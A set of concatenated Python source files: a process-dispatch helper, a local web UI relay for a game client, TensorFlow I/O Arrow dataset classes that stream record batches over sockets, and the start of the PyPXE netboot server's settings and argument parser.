        non_zero_jobs, columns=['user_id', 'count']).sort_values("count")
    ret_splits = [[] for _ in range(n_splits)]
    col = 0
    for nzj in non_zero_jobs_df.to_dict('records'):
        ret_splits[col].append(nzj['user_id'])
        col = col + 1
        if col == n_splits:
            logging.debug("reached n_splits, setting to zero")
            col = 0
    logging.debug("Split values are %s" % ret_splits)
    return ret_splits
def dispatch(split_lists, is_public_pipeline):
    """Launch one intake-pipeline process per UUID split.

    :param split_lists: lists of user UUIDs, one list per process
    :param is_public_pipeline: prefixes process ids with "public_" when True
    :return: the started ``multiprocessing.Process`` objects, so the caller
        can join or monitor them (the original built this list but
        discarded it)
    """
    process_list = []
    for i, uuid_list in enumerate(split_lists):
        logging.debug("Dispatching list %s" % uuid_list)
        pid = "public_%s" % i if is_public_pipeline else i
        p = mp.Process(target=epi.run_intake_pipeline, args=(pid, uuid_list))
        logging.info("Created process %s to process %s list of size %s" %
                     (p, i, len(uuid_list)))
        p.start()
        process_list.append(p)
    return process_list
|
WebUI.py | import http.server
import logging
import os
import socket
import socketserver
import threading
import webbrowser
import asyncio
from functools import partial
from NetUtils import Node
from MultiClient import Context
import Utils
logger = logging.getLogger("WebUIRelay")
class WebUiClient(Node):
    """Relay node that forwards client events to the browser-based UI.

    Every ``send_*``/``notify_*`` method packages its arguments into a
    {'type': ..., 'content': ...} message and broadcasts it to all
    connected UI websockets via ``broadcast_all`` (inherited from Node).
    The dict keys are consumed by the JS frontend — do not rename them.
    """

    def __init__(self):
        super().__init__()
        # Manually selected SNES device, if any (set externally)
        self.manual_snes = None

    @staticmethod
    def build_message(msg_type: str, content: dict) -> dict:
        """Wrap ``content`` in the envelope expected by the web UI."""
        # NOTE(review): the log_* methods pass a plain string as ``content``
        # despite the dict annotation — the UI appears to accept both.
        return {'type': msg_type, 'content': content}

    def log_info(self, message, *args, **kwargs):
        # Mirror each log level to the UI as well as the Python logger
        self.broadcast_all(self.build_message('info', message))
        logger.info(message, *args, **kwargs)

    def log_warning(self, message, *args, **kwargs):
        self.broadcast_all(self.build_message('warning', message))
        logger.warning(message, *args, **kwargs)

    def log_error(self, message, *args, **kwargs):
        self.broadcast_all(self.build_message('error', message))
        logger.error(message, *args, **kwargs)

    def log_critical(self, message, *args, **kwargs):
        self.broadcast_all(self.build_message('critical', message))
        logger.critical(message, *args, **kwargs)

    def send_chat_message(self, message):
        self.broadcast_all(self.build_message('chat', message))

    def send_connection_status(self, ctx: Context):
        # Fire-and-forget; must be called from within a running event loop
        asyncio.create_task(self._send_connection_status(ctx))

    async def _send_connection_status(self, ctx: Context):
        """Broadcast SNES/server connection state, falling back to the
        last cached server address when the context has none."""
        cache = Utils.persistent_load()
        cached_address = cache.get("servers", {}).get("default", None)
        server_address = ctx.server_address if ctx.server_address else cached_address if cached_address else None
        self.broadcast_all(self.build_message('connections', {
            'snesDevice': ctx.snes_attached_device[1] if ctx.snes_attached_device else None,
            'snes': ctx.snes_state,
            'serverAddress': server_address,
            'server': 1 if ctx.server is not None and not ctx.server.socket.closed else 0,
        }))

    def send_device_list(self, devices):
        self.broadcast_all(self.build_message('availableDevices', {
            'devices': devices,
        }))

    def poll_for_server_ip(self):
        # Ask the UI to report the server address it knows about
        self.broadcast_all(self.build_message('serverAddress', {}))

    def notify_item_sent(self, finder, recipient, item, location, i_am_finder: bool, i_am_recipient: bool):
        self.broadcast_all(self.build_message('itemSent', {
            'finder': finder,
            'recipient': recipient,
            'item': item,
            'location': location,
            'iAmFinder': 1 if i_am_finder else 0,
            'iAmRecipient': 1 if i_am_recipient else 0,
        }))

    def notify_item_found(self, finder: str, item: str, location: str, i_am_finder: bool):
        self.broadcast_all(self.build_message('itemFound', {
            'finder': finder,
            'item': item,
            'location': location,
            'iAmFinder': 1 if i_am_finder else 0,
        }))

    def notify_item_received(self, finder: str, item: str, location: str, item_index: int, queue_length: int):
        self.broadcast_all(self.build_message('itemReceived', {
            'finder': finder,
            'item': item,
            'location': location,
            'itemIndex': item_index,
            'queueLength': queue_length,
        }))

    def send_hint(self, finder, recipient, item, location, found, i_am_finder: bool, i_am_recipient: bool,
                  entrance_location: str = None):
        self.broadcast_all(self.build_message('hint', {
            'finder': finder,
            'recipient': recipient,
            'item': item,
            'location': location,
            'found': int(found),
            'iAmFinder': int(i_am_finder),
            'iAmRecipient': int(i_am_recipient),
            'entranceLocation': entrance_location,
        }))

    def send_game_info(self, ctx: Context):
        self.broadcast_all(self.build_message('gameInfo', {
            'clientVersion': Utils.__version__,
            'hintCost': ctx.hint_cost,
            'checkPoints': ctx.check_points,
            'forfeitMode': ctx.forfeit_mode,
            'remainingMode': ctx.remaining_mode,
        }))

    def send_location_check(self, ctx: Context, last_check: str):
        self.broadcast_all(self.build_message('locationCheck', {
            'totalChecks': len(ctx.locations_checked),
            'hintPoints': ctx.hint_points,
            'lastCheck': last_check,
        }))
class WaitingForUiException(Exception):
    """Raised while the client is still waiting for the web UI to attach."""
# Handle to the web-server thread created by start_server() (None until then).
web_thread = None
# TCP port the local web UI is served on.
PORT = 5050
class RequestHandler(http.server.SimpleHTTPRequestHandler):
    """Static-file handler with all request/error logging silenced."""

    def log_request(self, code='-', size='-'):
        # Suppress per-request log lines
        pass

    def log_message(self, format, *args):
        # Suppress generic handler log output
        pass

    def log_date_time_string(self):
        # Suppress timestamp generation used by the default logger
        pass
# Serve the bundled web UI assets out of data/web/public.
Handler = partial(RequestHandler,
                  directory=Utils.local_path("data", "web", "public"))
def start_server(socket_port: int, on_start=lambda: None):
    """Serve the web UI on PORT from a background thread.

    :param socket_port: MultiClient websocket port, forwarded to the UI as
        a query parameter when an already-running server is detected
    :param on_start: callback invoked once the server has bound successfully
    """
    global web_thread
    try:
        server = socketserver.TCPServer(("", PORT), Handler)
    except OSError:
        # In most cases "Only one usage of each socket address (protocol/network address/port) is normally permitted"
        # If the exception is caused by our desired port being unavailable, assume the web server is already running
        # from another client instance
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            if sock.connect_ex(('localhost', PORT)) == 0:
                logging.info("Web server is already running in another client window.")
                webbrowser.open(f'http://localhost:{PORT}?port={socket_port}')
                return
        # If the exception is caused by something else, report on it
        # (the redundant local ``import logging`` was removed; logging is
        # already imported at module level)
        logging.exception("Unable to bind port for local web server. The CLI client should work in all cases.")
    else:
        print("serving at port", PORT)
        on_start()
        # BUG FIX: Thread.start() returns None, so the original stored None
        # in web_thread. Keep the Thread object, then start it.
        web_thread = threading.Thread(target=server.serve_forever)
        web_thread.start()
|
arrow_dataset_ops.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Arrow Dataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import io
from itertools import chain
import os
import socket
import threading
import tempfile
import tensorflow as tf
from tensorflow import dtypes
from tensorflow.compat.v2 import data
from tensorflow.python.data.ops.dataset_ops import flat_structure
from tensorflow.python.data.util import structure as structure_lib
from tensorflow_io import _load_library
arrow_ops = _load_library('_arrow_ops.so')
if hasattr(tf, "nest"):
from tensorflow import nest # pylint: disable=ungrouped-imports
else:
from tensorflow.python.data.util import nest # pylint: disable=ungrouped-imports
def arrow_to_tensor_type(pa_t):
    """Convert Arrow type to tuple of (Tensor dtype, shape dims).
    This function requires pyarrow to be installed.
    """
    import pyarrow as pa
    # (predicate, TF dtype) pairs, checked in the same order as before
    scalar_checks = [
        (pa.types.is_boolean, dtypes.bool),
        (pa.types.is_int8, dtypes.int8),
        (pa.types.is_int16, dtypes.int16),
        (pa.types.is_int32, dtypes.int32),
        (pa.types.is_int64, dtypes.int64),
        (pa.types.is_uint8, dtypes.uint8),
        (pa.types.is_uint16, dtypes.uint16),
        (pa.types.is_uint32, dtypes.uint32),
        (pa.types.is_uint64, dtypes.uint64),
        (pa.types.is_float16, dtypes.float16),
        (pa.types.is_float32, dtypes.float32),
        (pa.types.is_float64, dtypes.float64),
    ]
    for is_type, tf_dtype in scalar_checks:
        if is_type(pa_t):
            return tf_dtype, []  # scalar: empty shape dims
    if pa.types.is_list(pa_t):
        if pa.types.is_list(pa_t.value_type):
            raise TypeError("Nested arrays are not currently supported: " + str(pa_t))
        tf_t, shape_dims = arrow_to_tensor_type(pa_t.value_type)
        shape_dims.append(None)  # pyarrow scalar arrays can be variable length
        return tf_t, shape_dims
    raise TypeError("Unsupported type in conversion from Arrow: " + str(pa_t))
def arrow_schema_to_tensor_types(schema):
    """Convert an Arrow schema to tuple of (Tensor dtypes, TensorShapes).
    This function requires pyarrow to be installed.
    """
    # Transpose the per-field (dtype, dims) pairs into parallel tuples
    tensor_types, shape_dims = zip(
        *(arrow_to_tensor_type(field.type) for field in schema)
    )
    return tensor_types, tuple(tf.TensorShape(dims) for dims in shape_dims)
class ArrowBaseDataset(data.Dataset):
    """Base class for Arrow Datasets to provide columns used in record batches
    and corresponding output tensor types, shapes and classes.
    """

    # Valid values for the ``batch_mode`` constructor argument
    batch_modes_supported = ('keep_remainder', 'drop_remainder', 'auto')

    def __init__(self,
                 make_variant_fn,
                 columns,
                 output_types,
                 output_shapes=None,
                 batch_size=None,
                 batch_mode='keep_remainder'):
        # make_variant_fn: op constructor called with columns/batch args
        # to produce the dataset's variant tensor
        self._columns = columns
        # Default to unknown shapes when the caller does not provide any
        self._structure = structure_lib.convert_legacy_structure(
            output_types,
            output_shapes or nest.map_structure(
                lambda _: tf.TensorShape(None), output_types),
            nest.map_structure(lambda _: tf.Tensor, output_types))
        # 0 acts as the "no batching" sentinel for the underlying op
        self._batch_size = tf.convert_to_tensor(
            batch_size or 0,
            dtype=dtypes.int64,
            name="batch_size")
        if batch_mode not in self.batch_modes_supported:
            raise ValueError(
                "Unsupported batch_mode: '{}', must be one of {}"
                .format(batch_mode, self.batch_modes_supported))
        self._batch_mode = tf.convert_to_tensor(
            batch_mode,
            dtypes.string,
            name="batch_mode")
        if batch_size is not None or batch_mode == 'auto':
            # pylint: disable=protected-access
            # Batched output: the leading dim is known only when the
            # remainder is dropped; otherwise it stays dynamic (None)
            self._structure = self._structure._batch(
                batch_size if batch_mode == 'drop_remainder' else None)
        variant_tensor = make_variant_fn(
            columns=self._columns,
            batch_size=self._batch_size,
            batch_mode=self._batch_mode,
            **flat_structure(self))
        super(ArrowBaseDataset, self).__init__(variant_tensor)

    def _inputs(self):
        # This dataset is a source: it has no input datasets
        return []

    @property
    def _element_structure(self):
        return self._structure

    @property
    def columns(self):
        # Column indices selected from the Arrow record batches
        return self._columns

    @property
    def batch_size(self):
        # int64 scalar tensor; 0 means unbatched
        return self._batch_size

    @property
    def batch_mode(self):
        # string scalar tensor; one of batch_modes_supported
        return self._batch_mode
class ArrowDataset(ArrowBaseDataset):
    """An Arrow Dataset from record batches in memory, or a Pandas DataFrame.
    """

    def __init__(self,
                 serialized_batches,
                 columns,
                 output_types,
                 output_shapes=None,
                 batch_size=None,
                 batch_mode='keep_remainder'):
        """Create an ArrowDataset from a Tensor of serialized batches.
        This constructor requires pyarrow to be installed.

        Args:
          serialized_batches: A string Tensor as a serialized buffer containing
                              Arrow record batches as Arrow file format
          columns: A list of column indices to be used in the Dataset
          output_types: Tensor dtypes of the output tensors
          output_shapes: TensorShapes of the output tensors or None to
                         infer partial
          batch_size: Batch size of output tensors, setting a batch size here
                      will create batched Tensors from Arrow memory and can be more
                      efficient than using tf.data.Dataset.batch().
                      NOTE: batch_size does not need to be set if batch_mode='auto'
          batch_mode: Mode of batching, supported strings:
                      "keep_remainder" (default, keeps partial batch data),
                      "drop_remainder" (discard partial batch data),
                      "auto" (size to number of records in Arrow record batch)
        """
        super(ArrowDataset, self).__init__(
            partial(arrow_ops.arrow_dataset, serialized_batches),
            columns,
            output_types,
            output_shapes,
            batch_size,
            batch_mode)

    @classmethod
    def from_record_batches(cls,
                            record_batches,
                            columns,
                            output_types,
                            output_shapes=None,
                            batch_size=None,
                            batch_mode='keep_remainder'):
        """Create an ArrowDataset directly from Arrow record batches.
        This constructor requires pyarrow to be installed.

        Args:
          record_batches: An Arrow record batch or sequence of record batches
          columns: A list of column indices to be used in the Dataset
          output_types: Tensor dtypes of the output tensors
          output_shapes: TensorShapes of the output tensors or None to
                         infer partial
          batch_size: Batch size of output tensors, setting a batch size here
                      will create batched tensors from Arrow memory and can be more
                      efficient than using tf.data.Dataset.batch().
                      NOTE: batch_size does not need to be set if batch_mode='auto'
          batch_mode: Mode of batching, supported strings:
                      "keep_remainder" (default, keeps partial batch data),
                      "drop_remainder" (discard partial batch data),
                      "auto" (size to number of records in Arrow record batch)
        """
        import pyarrow as pa
        if isinstance(record_batches, pa.RecordBatch):
            record_batches = [record_batches]
        if columns is None:
            columns = tuple(range(record_batches[0].num_columns))
        assert record_batches
        # Serialize the batches to the Arrow file format in memory; the
        # resulting buffer is handed to the dataset op as a string tensor
        buf = io.BytesIO()
        writer = pa.RecordBatchFileWriter(buf, record_batches[0].schema)
        for batch in record_batches:
            writer.write_batch(batch)
        writer.close()
        serialized_batches = tf.convert_to_tensor(
            buf.getvalue(),
            dtype=dtypes.string,
            name="serialized_batches")
        return cls(
            serialized_batches,
            columns,
            output_types,
            output_shapes,
            batch_size,
            batch_mode)

    @classmethod
    def from_pandas(cls,
                    df,
                    columns=None,
                    preserve_index=True,
                    batch_size=None,
                    batch_mode='keep_remainder'):
        """Create an ArrowDataset from a given Pandas DataFrame. Output types
        and shapes are inferred from the Arrow schema after DataFrame conversion.
        If preserve_index is True, the DataFrame index will be the last column.
        This method requires pyarrow to be installed.

        Args:
          df: a Pandas DataFrame
          columns: Optional column indices to use, if None all are used
          preserve_index: Flag to include the DataFrame index as the last column
          batch_size: Batch size of output tensors, setting a batch size here
                      will create batched tensors from Arrow memory and can be more
                      efficient than using tf.data.Dataset.batch().
                      NOTE: batch_size does not need to be set if batch_mode='auto'
          batch_mode: Mode of batching, supported strings:
                      "keep_remainder" (default, keeps partial batch data),
                      "drop_remainder" (discard partial batch data),
                      "auto" (size to number of records in Arrow record batch)
        """
        import pyarrow as pa
        if columns is not None:
            # Subset the DataFrame before conversion so indices re-number
            df = df.iloc[:, list(columns)]
        batch = pa.RecordBatch.from_pandas(df, preserve_index=preserve_index)
        columns = tuple(range(batch.num_columns))
        output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
        return cls.from_record_batches(
            batch,
            columns,
            output_types,
            output_shapes,
            batch_size,
            batch_mode)
class ArrowFeatherDataset(ArrowBaseDataset):
    """An Arrow Dataset for reading record batches from Arrow feather files.
    Feather is a light-weight columnar format ideal for simple writing of
    Pandas DataFrames. Pyarrow can be used for reading/writing Feather files,
    see https://arrow.apache.org/docs/python/ipc.html#feather-format
    """

    def __init__(self,
                 filenames,
                 columns,
                 output_types,
                 output_shapes=None,
                 batch_size=None,
                 batch_mode='keep_remainder'):
        """Create an ArrowDataset from one or more Feather file names.

        Args:
          filenames: A `tf.string` tensor, Python list or scalar containing files
                     in Arrow Feather format
          columns: A list of column indices to be used in the Dataset
          output_types: Tensor dtypes of the output tensors
          output_shapes: TensorShapes of the output tensors or None to
                         infer partial
          batch_size: Batch size of output tensors, setting a batch size here
                      will create batched tensors from Arrow memory and can be more
                      efficient than using tf.data.Dataset.batch().
                      NOTE: batch_size does not need to be set if batch_mode='auto'
          batch_mode: Mode of batching, supported strings:
                      "keep_remainder" (default, keeps partial batch data),
                      "drop_remainder" (discard partial batch data),
                      "auto" (size to number of records in Arrow record batch)
        """
        filenames = tf.convert_to_tensor(
            filenames,
            dtype=dtypes.string,
            name="filenames")
        super(ArrowFeatherDataset, self).__init__(
            partial(arrow_ops.arrow_feather_dataset, filenames),
            columns,
            output_types,
            output_shapes,
            batch_size,
            batch_mode)

    @classmethod
    def from_schema(cls,
                    filenames,
                    schema,
                    columns=None,
                    batch_size=None,
                    batch_mode='keep_remainder'):
        """Create an Arrow Dataset for reading record batches from Arrow feather
        files, inferring output types and shapes from the given Arrow schema.
        This method requires pyarrow to be installed.

        Args:
          filenames: A `tf.string` tensor, Python list or scalar containing files
                     in Arrow Feather format
          schema: Arrow schema defining the record batch data in the stream
          columns: A list of column indices to use from the schema, None for all
          batch_size: Batch size of output tensors, setting a batch size here
                      will create batched tensors from Arrow memory and can be more
                      efficient than using tf.data.Dataset.batch().
                      NOTE: batch_size does not need to be set if batch_mode='auto'
          batch_mode: Mode of batching, supported strings:
                      "keep_remainder" (default, keeps partial batch data),
                      "drop_remainder" (discard partial batch data),
                      "auto" (size to number of records in Arrow record batch)
        """
        if columns is None:
            columns = list(range(len(schema)))
        output_types, output_shapes = arrow_schema_to_tensor_types(schema)
        return cls(
            filenames,
            columns,
            output_types,
            output_shapes,
            batch_size,
            batch_mode)
class ArrowStreamDataset(ArrowBaseDataset):
  """An Arrow Dataset for reading record batches from an input stream.

  Currently supported input streams are a socket client or stdin.
  """

  def __init__(self,
               endpoints,
               columns,
               output_types,
               output_shapes=None,
               batch_size=None,
               batch_mode='keep_remainder'):
    """Create an ArrowDataset from an input stream.

    Args:
      endpoints: A `tf.string` tensor, Python list or scalar string defining
                 the input stream.
                 `endpoints` could have the following formats:
                 - "host:port": IPv4 address (default)
                 - "tcp://<host:port>": IPv4 address,
                 - "unix://<path>": local path as unix socket address,
                 - "fd://<number>": STDIN or file descriptor number. For
                   STDIN, use "fd://0" or "fd://-".
      columns: A list of column indices to be used in the Dataset
      output_types: Tensor dtypes of the output tensors
      output_shapes: TensorShapes of the output tensors or None to
                     infer partial
      batch_size: Batch size of output tensors, setting a batch size here
                  will create batched tensors from Arrow memory and can be more
                  efficient than using tf.data.Dataset.batch().
                  NOTE: batch_size does not need to be set if batch_mode='auto'
      batch_mode: Mode of batching, supported strings:
                  "keep_remainder" (default, keeps partial batch data),
                  "drop_remainder" (discard partial batch data),
                  "auto" (size to number of records in Arrow record batch)
    """
    # Normalize endpoints into the string tensor the kernel op expects.
    endpoints = tf.convert_to_tensor(
        endpoints,
        dtype=dtypes.string,
        name="endpoints")
    super(ArrowStreamDataset, self).__init__(
        partial(arrow_ops.arrow_stream_dataset, endpoints),
        columns,
        output_types,
        output_shapes,
        batch_size,
        batch_mode)

  @classmethod
  def from_schema(cls,
                  endpoints,
                  schema,
                  columns=None,
                  batch_size=None,
                  batch_mode='keep_remainder'):
    """Create an Arrow Dataset from an input stream, inferring output types
    and shapes from the given Arrow schema.

    This method requires pyarrow to be installed.

    Args:
      endpoints: A `tf.string` tensor, Python list or scalar string defining
                 the input stream.
                 `endpoints` could have the following formats:
                 - "host:port": IPv4 address (default)
                 - "tcp://<host:port>": IPv4 address,
                 - "unix://<path>": local path as unix socket address,
                 - "fd://<number>": STDIN or file descriptor number. For
                   STDIN, use "fd://0" or "fd://-".
      schema: Arrow schema defining the record batch data in the stream
      columns: A list of column indices to use from the schema, None for all
      batch_size: Batch size of output tensors, setting a batch size here
                  will create batched tensors from Arrow memory and can be more
                  efficient than using tf.data.Dataset.batch().
                  NOTE: batch_size does not need to be set if batch_mode='auto'
      batch_mode: Mode of batching, supported strings:
                  "keep_remainder" (default, keeps partial batch data),
                  "drop_remainder" (discard partial batch data),
                  "auto" (size to number of records in Arrow record batch)
    """
    if columns is None:
      columns = list(range(len(schema)))
    output_types, output_shapes = arrow_schema_to_tensor_types(schema)
    return cls(
        endpoints,
        columns,
        output_types,
        output_shapes,
        batch_size,
        batch_mode)

  @classmethod
  def from_record_batches(cls,
                          record_batch_iter,
                          output_types,
                          output_shapes=None,
                          columns=None,
                          batch_size=None,
                          batch_mode='keep_remainder'):
    """Create an ArrowStreamDataset by serving a sequence of Arrow record
    batches in a background thread.

    This constructor requires pyarrow to be installed.

    Args:
      record_batch_iter: A sequence or iterator of Arrow record batches
      output_types: Tensor dtypes of the output tensors
      output_shapes: TensorShapes of the output tensors or None to
                     infer partial
      columns: Optional list of column indices to be used, if None all are
               used
      batch_size: Batch size of output tensors, setting a batch size here
                  will create batched tensors from Arrow memory and can be more
                  efficient than using tf.data.Dataset.batch().
                  NOTE: batch_size does not need to be set if batch_mode='auto'
      batch_mode: Mode of batching, supported strings:
                  "keep_remainder" (default, keeps partial batch data),
                  "drop_remainder" (discard partial batch data),
                  "auto" (size to number of records in Arrow record batch)
    """
    import pyarrow as pa

    # Create a UDS server by default if not Windows
    if os.name != "nt":
      sock_path = os.path.join(tempfile.gettempdir(), 'arrow_io_stream.sock')
      endpoint = 'unix://{}'.format(sock_path)
      # Remove a stale socket file from a previous run; only re-raise when
      # the path still exists (i.e. unlink failed for another reason).
      try:
        os.unlink(sock_path)
      except OSError:
        if os.path.exists(sock_path):
          raise
      sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
      sock.bind(sock_path)
    # Create a TCP server
    else:
      sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      # Port 0 lets the OS pick a free port; read it back for the endpoint.
      sock.bind(('127.0.0.1', 0))
      host_addr, port = sock.getsockname()
      endpoint = '{}:{}'.format(host_addr, port)
    sock.listen(1)

    def run_server():
      """Serve record batches over the socket to a single client."""
      conn, _ = sock.accept()
      outfile = conn.makefile(mode='wb')
      writer = None
      for batch in record_batch_iter:
        if writer is None:
          # Lazily create the writer so the first batch supplies the schema.
          writer = pa.RecordBatchStreamWriter(outfile, batch.schema)
        writer.write_batch(batch)
      # NOTE(review): if record_batch_iter is empty, writer is still None
      # here and writer.close() would raise AttributeError — confirm callers
      # always provide at least one batch.
      writer.close()
      outfile.close()
      conn.close()
      sock.close()

    # Run the server in a thread
    server = threading.Thread(target=run_server)
    server.daemon = True
    server.start()

    if columns is None:
      columns = list(range(len(output_types)))

    return cls(
        endpoint,
        columns,
        output_types,
        output_shapes,
        batch_size,
        batch_mode)

  @classmethod
  def from_pandas(cls,
                  data_frames,
                  columns=None,
                  preserve_index=True,
                  batch_size=None):
    """Create an ArrowStreamDataset by serving a DataFrame, or batches of a
    DataFrame, in a background thread.

    This constructor requires pandas and pyarrow to be installed.

    Args:
      data_frames: A Pandas DataFrame or sequence of DataFrames
      columns: Optional column indices to use, if None all are used
      preserve_index: Flag to include the DataFrame index as the last column
      batch_size: Batch size of output tensors, setting a batch size here
                  will create batched tensors from Arrow memory and can be more
                  efficient than using tf.data.Dataset.batch().
                  NOTE: Currently, only 'keep_remainder' batch mode supported
    """
    import pandas as pd
    import pyarrow as pa

    if isinstance(data_frames, pd.DataFrame):
      data_frames = [data_frames]

    def gen_record_batches():
      """Yield Arrow record batches converted from the input DataFrames."""
      for df in data_frames:
        if columns is not None:
          df = df.iloc[:, list(columns)]
        # If batching, slice DataFrame and convert to record batches
        if batch_size is not None:
          # Pandas will produce a partial batch if there is a remainder
          for i in range(0, len(df), batch_size):
            df_slice = df[i:i + batch_size]
            batch = pa.RecordBatch.from_pandas(
                df_slice, preserve_index=preserve_index)
            yield batch
        # Not batching, convert entire DataFrame to one record batch
        else:
          batch = pa.RecordBatch.from_pandas(
              df, preserve_index=preserve_index)
          yield batch

    # Get first batch to convert schema to output types and shapes
    record_batch_iter = gen_record_batches()
    batch = next(record_batch_iter)
    output_types, output_shapes = arrow_schema_to_tensor_types(batch.schema)
    # Re-attach the consumed first batch so the server streams all data.
    return cls.from_record_batches(
        chain([batch], record_batch_iter),
        output_types,
        output_shapes,
        batch_size=batch_size,
        batch_mode='keep_remainder')
|
server.py | #!/usr/bin/env python
import threading
import io
import os
import sys
import json
import logging
import logging.handlers
try:
import argparse
except ImportError:
sys.exit("ImportError: You do not have the Python 'argparse' module installed. Please install the 'argparse' module and try again.")
from time import sleep
from pypxe import tftp # PyPXE TFTP service
from pypxe import dhcp # PyPXE DHCP service
from pypxe import http # PyPXE HTTP service
from pypxe import nbd # PyPXE NBD service
from pypxe import helpers
# Parsed configuration (argparse Namespace); populated in main().
args = None

# default settings — every key can be overridden via the CLI or a JSON
# config file (see parse_cli_arguments / --config)
SETTINGS = {'NETBOOT_DIR':'netboot',
            'NETBOOT_FILE':'',
            'DHCP_SERVER_IP':'192.168.2.2',
            'DHCP_SERVER_PORT':67,
            'DHCP_OFFER_BEGIN':'192.168.2.100',
            'DHCP_OFFER_END':'192.168.2.150',
            'DHCP_SUBNET':'255.255.255.0',
            'DHCP_DNS':'8.8.8.8',
            'DHCP_ROUTER':'192.168.2.1',
            'DHCP_BROADCAST':'',
            'DHCP_FILESERVER':'192.168.2.2',
            'DHCP_WHITELIST':False,
            'HTTP_PORT':80,
            'HTTP_SERVER_IP':'0.0.0.0',
            'LEASES_FILE':'',
            'STATIC_CONFIG':'',
            'SYSLOG_SERVER':None,
            'SYSLOG_PORT':514,
            'TFTP_SERVER_IP':'0.0.0.0',
            'USE_IPXE':False,
            'USE_HTTP':False,
            'USE_TFTP':True,
            'USE_DHCP':False,
            'DHCP_MODE_PROXY':False,
            'NBD_BLOCK_DEVICE':'',
            'NBD_WRITE':False,
            'NBD_COW':True,
            'NBD_COW_IN_MEM':False,
            'NBD_COPY_TO_RAM':False,
            'NBD_SERVER_IP':'0.0.0.0',
            'NBD_PORT':10809,
            'MODE_DEBUG':'',
            'MODE_VERBOSE':''}
def parse_cli_arguments():
    """Build the argparse parser from the current SETTINGS defaults and parse
    sys.argv.

    Returns:
        argparse.Namespace with one attribute per SETTINGS key (plus
        JSON_CONFIG / DUMP_CONFIG / DUMP_CONFIG_MERGED). Defaults come from
        the module-level SETTINGS dict, so re-calling this after updating
        SETTINGS (e.g. from a JSON config) picks up the new defaults.
    """
    # main service arguments
    parser = argparse.ArgumentParser(description = 'Set options at runtime. Defaults are in %(prog)s', formatter_class = argparse.ArgumentDefaultsHelpFormatter)
    # --ipxe/--no-ipxe (and the http/tftp pairs below) are mutually exclusive
    # on/off switches sharing one dest.
    ipxeexclusive = parser.add_mutually_exclusive_group(required = False)
    ipxeexclusive.add_argument('--ipxe', action = 'store_true', dest = 'USE_IPXE', help = 'Enable iPXE ROM', default = SETTINGS['USE_IPXE'])
    ipxeexclusive.add_argument('--no-ipxe', action = 'store_false', dest = 'USE_IPXE', help = 'Disable iPXE ROM', default = not SETTINGS['USE_IPXE'])
    httpexclusive = parser.add_mutually_exclusive_group(required = False)
    httpexclusive.add_argument('--http', action = 'store_true', dest = 'USE_HTTP', help = 'Enable built-in HTTP server', default = SETTINGS['USE_HTTP'])
    httpexclusive.add_argument('--no-http', action = 'store_false', dest = 'USE_HTTP', help = 'Disable built-in HTTP server', default = not SETTINGS['USE_HTTP'])
    tftpexclusive = parser.add_mutually_exclusive_group(required = False)
    tftpexclusive.add_argument('--tftp', action = 'store_true', dest = 'USE_TFTP', help = 'Enable built-in TFTP server, by default it is enabled', default = SETTINGS['USE_TFTP'])
    tftpexclusive.add_argument('--no-tftp', action = 'store_false', dest = 'USE_TFTP', help = 'Disable built-in TFTP server, by default it is enabled', default = not SETTINGS['USE_TFTP'])
    parser.add_argument('--debug', action = 'store', dest = 'MODE_DEBUG', help = 'Comma Seperated (http,tftp,dhcp). Adds verbosity to the selected services while they run. Use \'all\' for enabling debug on all services. Precede an option with \'-\' to disable debugging for that service; as an example, one can pass in the following to enable debugging for all services except the DHCP service: \'--debug all,-dhcp\'', default = SETTINGS['MODE_DEBUG'])
    parser.add_argument('--verbose', action = 'store', dest = 'MODE_VERBOSE', help = 'Comma Seperated (http,tftp,dhcp). Adds verbosity to the selected services while they run. Less verbose than \'debug\'. Use \'all\' for enabling verbosity on all services. Precede an option with \'-\' to disable debugging for that service; as an example, one can pass in the following to enable debugging for all services except the DHCP service: \'--debug all,-dhcp\'', default = SETTINGS['MODE_VERBOSE'])
    parser.add_argument('--config', action = 'store', dest = 'JSON_CONFIG', help = 'Configure from a JSON file rather than the command line', default = '')
    parser.add_argument('--dump-config', action = 'store_true', dest = 'DUMP_CONFIG', help = 'Dump the default configuration as a valid input file')
    parser.add_argument('--dump-config-merged', action = 'store_true', dest = 'DUMP_CONFIG_MERGED', help = 'Like --dump-config, but also merge in CLI options')
    parser.add_argument('--static-config', action = 'store', dest = 'STATIC_CONFIG', help = 'Configure leases from a json file rather than the command line', default = SETTINGS['STATIC_CONFIG'])
    parser.add_argument('--save-leases', action = 'store', dest = 'LEASES_FILE', help = 'Save all DHCP leases on exit or SIGHUP. Will load from this file on start', default = SETTINGS['LEASES_FILE'])
    parser.add_argument('--syslog', action = 'store', dest = 'SYSLOG_SERVER', help = 'Syslog server', default = SETTINGS['SYSLOG_SERVER'])
    parser.add_argument('--syslog-port', action = 'store', dest = 'SYSLOG_PORT', help = 'Syslog server port', default = SETTINGS['SYSLOG_PORT'])
    # DHCP server arguments
    dhcp_group = parser.add_argument_group(title = 'DHCP', description = 'Arguments relevant to the DHCP server')
    exclusive = dhcp_group.add_mutually_exclusive_group(required = False)
    exclusive.add_argument('--dhcp', action = 'store_true', dest = 'USE_DHCP', help = 'Enable built-in DHCP server', default = SETTINGS['USE_DHCP'])
    exclusive.add_argument('--dhcp-proxy', action = 'store_true', dest = 'DHCP_MODE_PROXY', help = 'Enable built-in DHCP server in proxy mode (implies --dhcp)', default = SETTINGS['DHCP_MODE_PROXY'])
    dhcp_group.add_argument('--dhcp-server-ip', action = 'store', dest = 'DHCP_SERVER_IP', help = 'DHCP Server IP', default = SETTINGS['DHCP_SERVER_IP'])
    dhcp_group.add_argument('--dhcp-server-port', action = 'store', dest = 'DHCP_SERVER_PORT', help = 'DHCP Server Port', default = SETTINGS['DHCP_SERVER_PORT'])
